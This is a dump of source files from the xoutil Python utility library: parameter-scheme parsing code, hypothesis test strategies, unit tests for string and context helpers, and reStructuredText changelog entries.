pm = ParamManager(args, kwargs)\n name = pm(0, 1, 'name', coerce=str)\n wrapped = pm(0, 1, 'wrapped', coerce=valid(callable))\n ...\n\n When an instance of this class is called (``__call__`` operator), it is\n used the same protocol as when creating an instance of a parameter\n definition row (`ParamSchemeRow`:class:).\n\n See `ParamScheme`:class: class as another way to define and validate\n schemes for extracting parameter values in a consistent way.\n\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n\n def __init__(self, args, kwds):\n \"\"\"Created with actual parameters of a client function.\"\"\"\n self.args = args\n self.kwds = kwds\n self.consumed = set() # consumed identifiers\n\n def __call__(self, *ids, **options):\n \"\"\"Get a parameter value.\"\"\"\n from xotl.tools.fp.option import Just, Wrong, none\n\n # TODO: Change this ``from xotl.tools.values import coercer``\n from xotl.tools.fp.prove.semantic import predicate as coercer\n\n args, kwds = self.args, self.kwds\n i, res = 0, none\n while isinstance(res, Wrong) and i < len(ids):\n key = ids[i]\n if key in self.consumed:\n pass\n elif isinstance(key, int):\n try:\n res = args[key]\n except IndexError:\n pass\n elif key in kwds:\n res = kwds[key]\n if not isinstance(res, Wrong) and \"coerce\" in options:\n aux = coercer(options[\"coerce\"])(res)\n res = aux.inner if isinstance(aux, Just) else aux\n if not isinstance(res, Wrong):\n self.consumed.add(key)\n if isinstance(key, int) and key < 0:\n # consume both, negative and adjusted value\n key = len(args) + key\n self.consumed.add(key)\n else:\n i += 1\n if isinstance(res, Wrong):\n if \"default\" in options:\n return options[\"default\"]\n elif isinstance(res.inner, BaseException):\n raise res.inner\n else:\n raise TypeError('value for \"{}\" is not found'.format(ids))\n else:\n return res.inner if isinstance(res, Just) else res\n\n def remainder(self):\n \"\"\"Return not consumed values in a mapping.\"\"\"\n passed = set(range(len(self.args))) | set(self.kwds)\n ids = passed - self.consumed\n args, kwds = self.args, self.kwds\n return {k: args[k] if isinstance(k, int) else kwds[k] for k in ids}\n\n\nclass ParamSchemeRow:\n \"\"\"Scheme row for a `ParamManager`:class: instance call.\n\n This class validates identifiers and options at this level; these\n checks are not done in a call to get a parameter value.\n\n Normally this class is used as part of a full `ParamScheme`:class:\n composition.\n\n Additionally to the options can be passed to\n `ParamManager.__call__`:meth:', this class can be instanced with:\n\n :param ids: positional variable number arguments, could be aliases for\n keyword parameter passing, or integers for order (negative values\n are means right-to-left indexing, like in sequences);\n\n :param key: an identifier to be used when the parameter is only positional\n or when none of the possible keyword aliases must be used as the\n primary-key;\n\n :param default: keyword argument, value used if the parameter is absent;\n\n :param coerce: check if a value is valid or not and convert to its\n definitive value; see `xotl.tools.values`:mod: module for more\n information.\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n\n __slots__ = (\"ids\", \"options\", \"_key\")\n\n def __init__(self, *ids, **options):\n from collections import Counter\n from xotl.tools.fp.option import none\n\n iskey = lambda s: isinstance(s, str) and s.isidentifier()\n # TODO: Change this ``from xotl.tools.values import coercer``\n from xotl.tools.fp.prove.semantic import predicate as coercer\n\n aux = {k: c for k, c in Counter(ids).items() if c > 1}\n if aux:\n parts = [\"{!r} ({})\".format(k, aux[k]) for k in aux]\n msg = \"{}() repeated identifiers: {}\"\n raise TypeError(msg.format(type(self).__name__, \", \".join(parts)))\n else:\n\n def ok(k):\n return iskey(k) or isinstance(k, int)\n\n bad = [k for k in ids if not ok(k)]\n if bad:\n msg = (\n \"{}() identifiers with wrong type (only int and str \" \"allowed): {}\"\n )\n raise TypeError(msg.format(type(self).__name__, bad))\n key = options.pop(\"key\", none)\n if not (key is none or iskey(key)):\n msg = '\"key\" option must be an identifier, \"{}\" of type \"{}\" ' \"given\"\n raise TypeError(msg.format(key, type(key).__name__))\n if \"default\" in options:\n aux = {\"default\": options.pop(\"default\")}\n else:\n aux = {}\n if \"coerce\" in options:\n aux[\"coerce\"] = coercer(options.pop(\"coerce\"))\n if options:\n msg = \"{}(): received invalid keyword parameters: {}\"\n raise TypeError(msg.format(type(self).__name__, set(options)))\n self.ids = ids\n self.options = aux\n self._key = key\n\n def __str__(self):\n parts = [repr(k) for k in self.ids]\n for key, value in self.options.items():\n parts.append(\"{}={!r}\".format(key, value))\n aux = \", \".join(parts)\n return \"ParamSchemeRow({})\".format(aux)\n\n __repr__ = __str__\n\n def __call__(self, *args, **kwds):\n \"\"\"Execute a scheme-row using as argument a `ParamManager` instance.\n\n The concept of `ParamManager`:class: instance argument is a little\n tricky: when a variable number of arguments is used, if only one\n positional and is already an instance of `ParamManager`:class:, it is\n directly used; if two, the first is a `tuple` and the second is a\n `dict`, these are considered the constructor arguments of the new\n instance; otherwise all arguments are used to build the new instance.\n\n \"\"\"\n count = len(args)\n if count == 1 and not kwds and isinstance(args[0], ParamManager):\n manager = args[0]\n else:\n if count == 2 and not kwds:\n a, k = args\n if isinstance(a, tuple) and isinstance(k, dict):\n args, kwds = a, k\n manager = ParamManager(args, kwds)\n return manager(*self.ids, **self.options)\n\n @property\n def default(self):\n \"\"\"Returned value if parameter value is absent.\n\n If not defined, special value ``none`` is returned.\n\n \"\"\"\n from xotl.tools.fp.option import none\n\n return self.options.get(\"default\", none)\n\n @property\n def key(self):\n \"\"\"The primary key for this scheme-row definition.\n\n This concept is a little tricky (the first string identifier if some\n is given, if not then the first integer). This definition is useful,\n for example, to return remainder not consumed values after a scheme\n process is completed (see `ParamManager.remainder`:meth: for more\n information).\n\n \"\"\"\n # TODO: calculate the key value in the constructor\n from xotl.tools.fp.option import none\n\n res = self._key\n if res is none:\n res = next((k for k in self.ids if isinstance(k, str)), None)\n if res is None:\n res = self.ids[0]\n self._key = res\n return res\n\n\nclass ParamScheme:\n \"\"\"Full scheme for a `ParamManager`:class: instance call.\n\n This class receives a set of `ParamSchemeRow`:class: instances and\n validate them as a whole.\n\n .. versionadded:: 1.8.0\n\n \"\"\"\n\n __slots__ = (\"rows\", \"cache\")\n\n def __init__(self, *rows):\n from xotl.tools.params import check_count\n\n check_count(len(rows) + 1, 2, caller=type(self).__name__)\n used = set()\n for idx, row in enumerate(rows):\n if isinstance(row, ParamSchemeRow):\n this = {k for k in row.ids if isinstance(k, str)}\n aux = used & this\n if not aux:\n used |= this\n else:\n msg = (\n '{}() repeated keyword identifiers \"{}\" in ' \"row {}\"\n ).format(type(self).__name__, aux, idx)\n raise ValueError(msg)\n self.rows = rows\n self.cache = None\n\n def __str__(self):\n # XXX: Use:: ',\\n\\i'.join(map(str, self))\n aux = \",\\n\\t\".join(str(row) for row in self)\n return \"{}({})\".format(type(self).__name__, aux)\n\n def __repr__(self):\n return \"{}({} rows)\".format(type(self).__name__, len(self))\n\n def __len__(self):\n \"\"\"The defined scheme-rows number.\"\"\"\n return len(self.rows)\n\n def __getitem__(self, idx):\n \"\"\"Obtain the scheme-row by a given index.\"\"\"\n if isinstance(idx, str):\n cache = self._getcache()\n return cache[idx]\n else:\n return self.rows[idx]\n\n def __iter__(self):\n \"\"\"Iterate over all defined scheme-rows.\"\"\"\n return iter(self.rows)\n\n def __call__(self, args, kwds, strict=True):\n \"\"\"Get a mapping with all resulting values.\n\n If special value 'none' is used as 'default' option in a scheme-row,\n corresponding value isn't returned in the mapping if the parameter\n value is missing.\n\n \"\"\"\n\n def ok(v):\n from xotl.tools.fp.option import Wrong\n\n return not isinstance(v, Wrong)\n\n pm = ParamManager(args, kwds)\n aux = ((row.key, row(pm)) for row in self)\n res = {key: value for key, value in aux if ok(value)}\n rem = pm.remainder()\n if strict:\n if rem:\n msg = (\n \"after a full `{}` process, there are still remainder \"\n \"parameters: {}\"\n )\n raise TypeError(msg.format(type(self).__name__, set(rem)))\n else:\n res.update(rem)\n return res\n\n def keys(self):\n \"\"\"Partial compatibility with mappings.\"\"\"\n return self._getcache().keys()\n\n def items(self):\n \"\"\"Partial compatibility with mappings.\"\"\"\n return self._getcache().items()\n\n @property\n def defaults(self):\n \"\"\"Return a mapping with all valid default values.\"\"\"\n\n def ok(v):\n from xotl.tools.fp.option import Wrong\n\n return not isinstance(v, Wrong)\n\n aux = ((row.key, row.default) for row in self)\n return {k: d for k, d in aux if ok(d)}\n\n def _getcache(self):\n if not self.cache:\n self.cache = {row.key: row for row in self}\n return self.cache\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 76, "blob_id": "f77c0dee0e9142ba8a38b99f2c0b5d72e645f201", "content_id": "e3f29eed6973be4e6ef94244721f169597074c3d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 77, "license_type": "permissive", "max_line_length": 76, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.7.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "Incorporates all (applicable) changes from `release 1.9.7 <rel-1.9.7>`:ref:\\\n" }, { "alpha_fraction": 0.7536231875419617, "alphanum_fraction": 0.7536231875419617, "avg_line_length": 68, "blob_id": "ee86d95ce2ea38852772a243187fa3977d9fcb19", "content_id": "b93dc0a0b9dbb06137c1c425e2ea36b6338e15f3", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 69, "license_type": "permissive", "max_line_length": 68, "num_lines": 1, "path": "/docs/source/history/_changes-2.1.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Correct `xotl.tools.infinity.Infinity`:obj: so that it's hashable.\n" }, { "alpha_fraction": 0.614835262298584, "alphanum_fraction": 0.6247408390045166, "avg_line_length": 32.9140625, "blob_id": "7b5eab35195d47c25809cb92f362a8dc19ac461c", "content_id": "ac5be491749736145d154983635043a1b16cf1d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4342, "license_type": "no_license", "max_line_length": 82, "num_lines": 128, "path": "/xotl/tools/testing/datetime.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nfrom hypothesis import strategies\n\n\[email protected]\ndef timespans(draw, dates=None, unbounds=\"any\", always_valid=True):\n \"\"\"A strategy that generates `xotl.tools.future.datetime.TimeSpan`:class:.\n\n This is a `hypothesis`_ strategy.\n\n `dates` should be None or generator of `datetime.date`:class: objects.\n It defaults to `hypothesis.strategies.dates`:func:\n\n `unbounds` should be one of the strings 'none', 'any', 'past', 'future'.\n If 'any' then the generated time span can be `unbound\n <xotl.tools.future.datetime.TimeSpan.unbound>`:attr:. If 'past' it can be\n unbound to the past. If 'future', it can be unbound to the future. If\n 'none', the generated time span will always be bound. In all cases that\n generate unbound time spans, we can also generate bound time spans.\n\n If `always_valid` is True all generated time spans will be `valid\n <xotl.tools.future.datetime.TimeSpan.valid>`:attr:. Otherwise we may\n generate invalid ones.\n\n Usage::\n\n >>> from hypothesis import given\n >>> from xotl.tools.testing.datetime import timespans\n\n >>> @given(timespans())\n ... def test_timespan(ts):\n ... pass\n\n .. _hypothesis: https://hypothesis.readthedocs.io/\n\n .. versionadded:: 1.8.2\n\n \"\"\"\n from xotl.tools.future.datetime import TimeSpan\n\n if dates is None:\n dates = strategies.dates()\n maybe = strategies.none() | dates\n if unbounds in (\"any\", \"past\", \"future\", \"none\"):\n if unbounds in (\"any\", \"past\"):\n date1 = draw(maybe)\n else:\n date1 = draw(dates)\n if unbounds in (\"any\", \"future\"):\n date2 = draw(maybe)\n else:\n date2 = draw(dates)\n else:\n raise ValueError(\"unbounds should be one of 'any', 'past', or 'future'.\")\n if date1 and date2 and always_valid:\n start1 = min(date1, date2)\n end1 = max(date1, date2)\n else:\n start1 = date1\n end1 = date2\n return TimeSpan(start_date=start1, end_date=end1)\n\n\[email protected]\ndef datetimespans(draw, dates=None, unbounds=\"any\", always_valid=True):\n \"\"\"A strategy that generates `xotl.tools.future.datetime.DateTimeSpan`:class:.\n\n This is a `hypothesis`_ strategy.\n\n `dates` should be None or generator of `datetime.datetime`:class: objects.\n It defaults to `hypothesis.strategies.datetimes`:func:\n\n `unbounds` should be one of the strings 'none', 'any', 'past', 'future'.\n If 'any' then the generated time span can be `unbound\n <xotl.tools.future.datetime.TimeSpan.unbound>`:attr:. If 'past' it can be\n unbound to the past. If 'future', it can be unbound to the future. If\n 'none', the generated time span will always be bound. In all cases that\n generate unbound time spans, we can also generate bound time spans.\n\n If `always_valid` is True all generated time spans will be `valid\n <xotl.tools.future.datetime.TimeSpan.valid>`:attr:. Otherwise we may\n generate invalid ones.\n\n Usage::\n\n >>> from hypothesis import given\n >>> from xotl.tools.testing.datetime import datetimespans\n\n >>> @given(datetimespans())\n ... def test_datetimespan(dts):\n ... pass\n\n .. _hypothesis: https://hypothesis.readthedocs.io/\n\n .. versionadded:: 1.9.7\n\n \"\"\"\n from xotl.tools.future.datetime import DateTimeSpan\n\n if dates is None:\n dates = strategies.datetimes()\n maybe = strategies.none() | dates\n if unbounds in (\"any\", \"past\", \"future\", \"none\"):\n if unbounds in (\"any\", \"past\"):\n date1 = draw(maybe)\n else:\n date1 = draw(dates)\n if unbounds in (\"any\", \"future\"):\n date2 = draw(maybe)\n else:\n date2 = draw(dates)\n else:\n raise ValueError(\"unbounds should be one of 'any', 'past', or 'future'.\")\n if date1 and date2 and always_valid:\n start1 = min(date1, date2)\n end1 = max(date1, date2)\n else:\n start1 = date1\n end1 = date2\n return DateTimeSpan(start_datetime=start1, end_datetime=end1)\n" }, { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.6962025165557861, "avg_line_length": 78, "blob_id": "03f3373e5a03d6fa33b0097e37a26b3c8965fa13", "content_id": "4dba8fc46b9576155682e88d0274f2cd8f0f93d9", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 79, "license_type": "permissive", "max_line_length": 78, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "Incorporates all (applicable) changes from `release 1.9.5 <rel-1.9.5>`:ref:\\ :\n" }, { "alpha_fraction": 0.5883758068084717, "alphanum_fraction": 0.6003184914588928, "avg_line_length": 32.05263137817383, "blob_id": "7038730d37353d628b2e381407186f00d136bcf7", "content_id": "65bf04218b83f4c5701107479103eb23cf8039e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2516, "license_type": "no_license", "max_line_length": 72, "num_lines": 76, "path": "/tests/test_string.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nfrom hypothesis import given, example\nfrom hypothesis.strategies import text\n\n\ndef test_slugify():\n from xoutil.string import slugify\n\n value = \" Á.e i Ó u \"\n options = dict(encoding=\"utf-8\")\n assert slugify(value, **options) == \"a-e-i-o-u\"\n assert slugify(value, \".\", invalid_chars=\"AU\", **options) == \"e.i.o\"\n assert slugify(value, valid_chars=\".\", **options) == \"a.e-i-o-u\"\n assert slugify(\"_x\", \"_\") == \"_x\"\n assert slugify(\"-x\", \"_\") == \"x\"\n assert slugify(\"-x-y-\", \"_\") == \"x_y\"\n assert slugify(None) == \"none\"\n assert slugify(1 == 1) == \"true\"\n assert slugify(1.0) == \"1-0\"\n assert slugify(135) == \"135\"\n assert slugify(123456, \"\", invalid_chars=\"52\") == \"1346\"\n assert slugify(\"_x\", \"_\") == \"_x\"\n\n\n# FIXME: Dont filter; `slugify` should consider this.\nvalid_replacements = text().filter(lambda x: \"\\\\\" not in x)\n\n\n@given(s=text(), invalid_chars=text(), replacement=valid_replacements)\n@example(s=\"0/0\", invalid_chars=\"-\", replacement=\"-\")\ndef test_slugify_hypothesis(s, invalid_chars, replacement):\n # TODO: (s='0:0', invalid_chars='z', replacement='ź')\n from xoutil.string import slugify\n from xoutil.string import force_ascii\n\n assert \" \" not in slugify(s), \"Slugs do not contain spaces\"\n\n assert \" \" in slugify(\n s + \" \", valid_chars=\" \"\n ), \"Slugs do contain spaces if explicitly allowed\"\n\n replacement = force_ascii(replacement).lower()\n invalid_chars = force_ascii(invalid_chars).lower()\n assert all(\n c not in slugify(s, replacement, invalid_chars=c)\n for c in invalid_chars\n if c not in replacement\n ), \"Slugs dont contain invalid chars\"\n\n\n@given(s=text(), p=text())\ndef test_cutting_is_inverse_to_adding(s, p):\n from xoutil.string import cut_prefix, cut_suffix\n\n assert cut_prefix(p + s, p) == s\n assert cut_suffix(s + p, p) == s\n assert cut_suffix(s, \"\") == s\n assert cut_prefix(s, \"\") == s\n\n\n@given(s=text(), p=text())\ndef test_cutting_is_stable(s, p):\n from xoutil.string import cut_prefix, cut_suffix\n\n if not s.startswith(p):\n assert cut_prefix(s, p) == s == cut_prefix(cut_prefix(s, p), p)\n if not s.endswith(p):\n assert cut_suffix(s, p) == s == cut_suffix(cut_suffix(s, p), p)\n" }, { "alpha_fraction": 0.6698113083839417, "alphanum_fraction": 0.698113203048706, "avg_line_length": 34.33333206176758, "blob_id": "c505cad5af86d55307ab173938e6c266386cb9c6", "content_id": "0068762f10e5384142a3ab5efcb46da973ed5c37", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 106, "license_type": "permissive", "max_line_length": 55, "num_lines": 3, "path": "/docs/source/history/_changes-1.9.8.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug__ in `xoutil.cli`:mod: for Python 3.7.\n\n__ https://gitlab.merchise.org/merchise/xoutil/issues/3\n" }, { "alpha_fraction": 0.7165898680686951, "alphanum_fraction": 0.7165898680686951, "avg_line_length": 38.45454406738281, "blob_id": "f0890cb0c89a5f916d94ec6567ccf1845616f01c", "content_id": "4a7839d6756694fcc119049532aa47851eb3f952", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 434, "license_type": "permissive", "max_line_length": 75, "num_lines": 11, "path": "/docs/source/history/_changes-1.8.2.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add displacement operations `left shift (\\<\\<)\n <xoutil.future.datetime.TimeSpan.__lshift__>`:meth: and `right shift (>>)\n <xoutil.future.datetime.TimeSpan.__rshift__>`:meth: for\n `~xoutil.future.datetime.TimeSpan`:class:.\n\n- Add `xoutil.objects.smart_getter`:func: and\n `xoutil.objects.save_attributes`:func:.\n\n- Document experimental module `xoutil.tasking`:mod:.\n\n- Add extra (and experimental) module `xoutil.testing`:mod:.\n" }, { "alpha_fraction": 0.5324789881706238, "alphanum_fraction": 0.5489763021469116, "avg_line_length": 29.58108139038086, "blob_id": "40a09561ccf898d599beea5cb5a0472942cbdd63", "content_id": "acfc7c244ab237dac0df053b74a00cf3e27d1476", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6790, "license_type": "no_license", "max_line_length": 78, "num_lines": 222, "path": "/tests/test_context.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\nimport pytest\n\n# Test concurrent access to context by several greenlets. Verify isolation in\n# the greenlets. We don't test isolation for threads cause that depends on\n# python's thread locals and we *rely* on its correctness.\n#\n# Since xoutil.context inspects sys.modules to test for greenlet presence we\n# need to import greenlets before importing context.\n#\ntry:\n import greenlet\nexcept ImportError:\n GREENLETS = False\nelse:\n GREENLETS = True\n\nimport sys\n\nsys.modules.pop(\"xoutil.tasking\", None)\nsys.modules.pop(\"xoutil.context\", None)\ndel sys\n\nfrom xoutil.context import context\n\n\nclass TestContext(unittest.TestCase):\n def test_simple_contexts(self):\n with context(\"CONTEXT-1\"):\n self.assertIsNot(None, context[\"CONTEXT-1\"])\n with context(\"CONTEXT-1\"):\n with context(\"context-2\"):\n self.assertIsNot(None, context[\"CONTEXT-1\"])\n self.assertIsNot(None, context[\"context-2\"])\n self.assertEqual(False, bool(context[\"context-2\"]))\n self.assertIsNot(None, context[\"CONTEXT-1\"])\n self.assertEqual(False, bool(context[\"CONTEXT-1\"]))\n\n def test_with_objects(self):\n CONTEXT1 = object()\n CONTEXT2 = object()\n with context(CONTEXT1):\n self.assertIsNot(None, context[CONTEXT1])\n with context(CONTEXT1):\n with context(CONTEXT2):\n self.assertIsNot(None, context[CONTEXT1])\n self.assertIsNot(None, context[CONTEXT2])\n self.assertEqual(False, bool(context[CONTEXT2]))\n self.assertIsNot(None, context[CONTEXT1])\n self.assertEqual(False, bool(context[CONTEXT1]))\n\n\ndef test_stacking_of_data_does_not_leak():\n c1 = \"CONTEXT-1\"\n with context(c1, a=1, b=1) as cc1:\n assert cc1[\"a\"] == 1\n with context(c1, a=2, z=\"zzz\") as cc2:\n assert cc2 is cc1\n assert cc2[\"a\"] == 2\n assert cc2[\"b\"] == 1 # Given by the upper enclosing level\n assert cc2[\"z\"] == \"zzz\"\n\n # Let's change it for this level\n cc2[\"b\"] = \"jailed!\"\n assert cc2[\"b\"] == \"jailed!\"\n\n # But in the upper level both a and b stay the same\n assert cc1[\"a\"] == 1\n assert cc1[\"b\"] == 1\n assert set(cc1) == {\"a\", \"b\"}\n\n try:\n assert cc1[\"a\"] == 1\n assert False\n except (IndexError, KeyError):\n pass\n\n\ndef test_data_is_an_opendict():\n c1 = object()\n with context(c1, a=1, b=1) as cc1:\n with context(c1, a=2) as cc2:\n assert cc2 is cc1\n assert cc2.a == 2\n assert cc2.b == 1 # Given by the upper enclosing level\n cc2.b = \"jaile!d\"\n assert cc1.a == 1\n assert cc1[\"b\"] == 1\n\n\ndef test_reusing_raises():\n with context(\"a\") as a:\n try:\n with a:\n pass\n assert False, \"It should have raised a RuntimeError\"\n except RuntimeError:\n pass\n except: # noqa\n assert False, \"It should have raised a RuntimeError\"\n\n\ndef test_from_dicts():\n with context.from_dicts(\"A\", dict(a=1), dict(a=2, b=1)) as c:\n assert c[\"a\"] == 1\n assert c[\"b\"] == 1\n with context.from_dicts(\"A\", dict(a=2), dict(b=2)) as c:\n assert c[\"b\"] == 1\n assert c[\"a\"] == 2\n assert c[\"b\"] == 1\n assert c[\"a\"] == 1\n\n\ndef test_from_defaults():\n with context.from_defaults(\"A\", a=1):\n with context.from_defaults(\"A\", a=2, b=1) as c:\n assert c[\"a\"] == 1\n assert c[\"b\"] == 1\n with context(\"A\", a=2) as c2:\n assert c2[\"a\"] == 2\n # It recovers the value\n assert c[\"a\"] == 1\n # and again\n assert c[\"a\"] == 1\n\n\ndef test_recover_from_runtime_bug_33():\n try:\n with context(\"A\") as c:\n with c:\n pass\n except RuntimeError:\n pass\n\n with context(\"A\"):\n pass\n\n\ndef test_null_context_is_mapping():\n from xoutil.context import NullContext\n\n dict(**NullContext())\n\n\[email protected](not GREENLETS, reason=\"greenlet is not installed\")\ndef test_greenlet_contexts():\n import random\n from xoutil.symbols import Unset\n\n calls = 0\n switches = 0\n\n class GreenletProg:\n def __init__(self, arg):\n self.arg = arg\n\n def __call__(self):\n nonlocal calls\n nonlocal switches\n calls += 1\n switches += 1\n assert \"GREEN CONTEXT\" not in context\n with context(\"GREEN CONTEXT\") as ctx:\n assert ctx.get(\"greenvar\", Unset) is Unset\n ctx[\"greenvar\"] = self.arg\n root.switch()\n switches += 1\n assert ctx[\"greenvar\"] == self.arg\n # list() makes KeyViews pass in Python 3+\n assert list(ctx.keys()) == [\"greenvar\"]\n\n def loop(n):\n nonlocal calls\n nonlocal switches\n greenlets = [greenlet.greenlet(run=GreenletProg(i)) for i in range(n)]\n calls = 0\n switches = 0\n while greenlets:\n pos = random.randrange(0, len(greenlets))\n gl = greenlets[pos]\n gl.switch()\n # The gl has relinquished control, so if its dead removed from the\n # list, otherwise let it be for another round.\n if gl.dead:\n del greenlets[pos]\n assert calls == n, \"There should be N calls to greenlets.\"\n assert switches == 2 * n, \"There should be 2*N switches.\"\n\n def loop_determ(n):\n nonlocal calls\n nonlocal switches\n greenlets = [greenlet.greenlet(run=GreenletProg(i)) for i in range(n)]\n pos = 0\n calls = 0\n switches = 0\n while greenlets:\n gl = greenlets[pos]\n gl.switch()\n # The gl has relinquished control, so if its dead removed from the\n # list, otherwise let it be for another round.\n if gl.dead:\n del greenlets[pos]\n # In this case we ensure there will be several concurrent\n # greenlets\n pos = ((pos + 1) % len(greenlets)) if greenlets else 0\n assert calls == n, \"There should be N calls to greenlets.\"\n assert switches == 2 * n, \"There should be 2*N switches.\"\n\n root = greenlet.greenlet(run=loop)\n root.switch(10)\n\n root = greenlet.greenlet(run=loop_determ)\n root.switch(5)\n" }, { "alpha_fraction": 0.7274633049964905, "alphanum_fraction": 0.7316561937332153, "avg_line_length": 33.07143020629883, "blob_id": "afff56421366178708f0a982d3103ce9ed9cbd7d", "content_id": "e1d9f5eb626afbc23ba10e7da2924079cd880e8d", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 477, "license_type": "permissive", "max_line_length": 69, "num_lines": 14, "path": "/docs/source/CONTRIBUTORS.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "List of contributors\n====================\n\nIf you're a contributor and you're not listed here, we appologize for\nthat omission, and ask you to add yourself to the list.\n\n- Medardo Rodríguez started this package and wrote most of it.\n\n- Dunia Trujillo has fixed bugs, tested the software and also\n contributed code.\n\n- Manuel Vázquez has contribute code and reorganize the package for\n the 1.1.x release series. He has contributed also to the\n documentation and docstring in reST format with doctests.\n" }, { "alpha_fraction": 0.6907356977462769, "alphanum_fraction": 0.7275204062461853, "avg_line_length": 42.17647171020508, "blob_id": "f0a61da4a4c90b78831646bb7ab126e870bdf700", "content_id": "ac617436c7b3cb4ccdcb764cfd415f54dabe8dba", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 734, "license_type": "permissive", "max_line_length": 78, "num_lines": 17, "path": "/docs/source/history/_changes-1.6.11.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "This is the last release of the 1.6 series. It's being synchronized with\nrelease 1.7.0 to deprecate here what's being changed there.\n\n- The `defaults` argument of `xoutil.objects.smart_copy`:func: is marked to be\n keyword-only in version 1.7.0.\n\n- Fixes a bug in `xoutil.objects.smart_copy`:func:. If `defaults` was None is\n was not being treated the same as being False, as documented. This bug was\n also fixed in version 1.7.0.\n\n- `xoutil.objects.metaclass`:func: will be moved to `xoutil.eight.meta` in\n version 1.7.0 and deprecated, it will be removed from `xoutil.object`:mod:\n in version 1.7.1.\n\n\n- This release will be the last to support Python 3.1, 3.2 and 3.3. Support\n will be kept for Python 2.7 and Python 3.4.\n" }, { "alpha_fraction": 0.7192816734313965, "alphanum_fraction": 0.7230623960494995, "avg_line_length": 39.69230651855469, "blob_id": "322b7ac76122572a9cf4a147ed64f16fcd152ba9", "content_id": "549e2a77c03df70a4e58251869970d50ec3a323c", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1058, "license_type": "permissive", "max_line_length": 78, "num_lines": 26, "path": "/docs/source/xotl.tools/fp/option.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.fp.option`:mod: - Functional Programming Option Type\n================================================================\n\n.. automodule:: xotl.tools.fp.option\n :members:\n\n\nFurther Notes\n-------------\n\nIt could be thought that this kind of concept is useless in Python because the\ndynamic nature of the language, but always there are certain logic systems\nthat need to wrap \"correct\" false values and \"incorrect\" true values.\n\nAlso, in functional programming, errors can be reasoned in a new way: more\nlike as *error values* than in *exception handling*. Where the `Maybe`:class:\ntype expresses the failure possibility through `Wrong`:class: instances\nencapsulating errors.\n\nWhen receiving a `Wrong`:class: instance encapsulating an error, and want to\nrecover the *exception propagation style* -instead of continue in *pure\nfunctional programming*-, to re-raise the exception, instead the `raise`\nPython statement, use `~xotl.tools.eight.errors.throw`:func:.\n\nSee https://en.wikipedia.org/wiki/Monad_%28functional_programming%29#\\\nThe_Maybe_monad\n" }, { "alpha_fraction": 0.656862735748291, "alphanum_fraction": 0.686274528503418, "avg_line_length": 21.66666603088379, "blob_id": "ebe1433d91bd014c52b301e101ec9399890b86ee", "content_id": "f2b31ea1365cc639a0b24a30f0507e016f204c02", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 204, "license_type": "permissive", "max_line_length": 70, "num_lines": 9, "path": "/docs/source/history/_changes-1.6.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added the module `xoutil.records`:mod:.\n\n- Deleted deprecated ``xoutil.compat``.\n\n\n- Deprecate the `xoutil.six`. It will removed in 1.7.0 (probably next\n release).\n\n Now xoutil requires `six` 1.8.0.\n" }, { "alpha_fraction": 0.729468584060669, "alphanum_fraction": 0.739130437374115, "avg_line_length": 68, "blob_id": 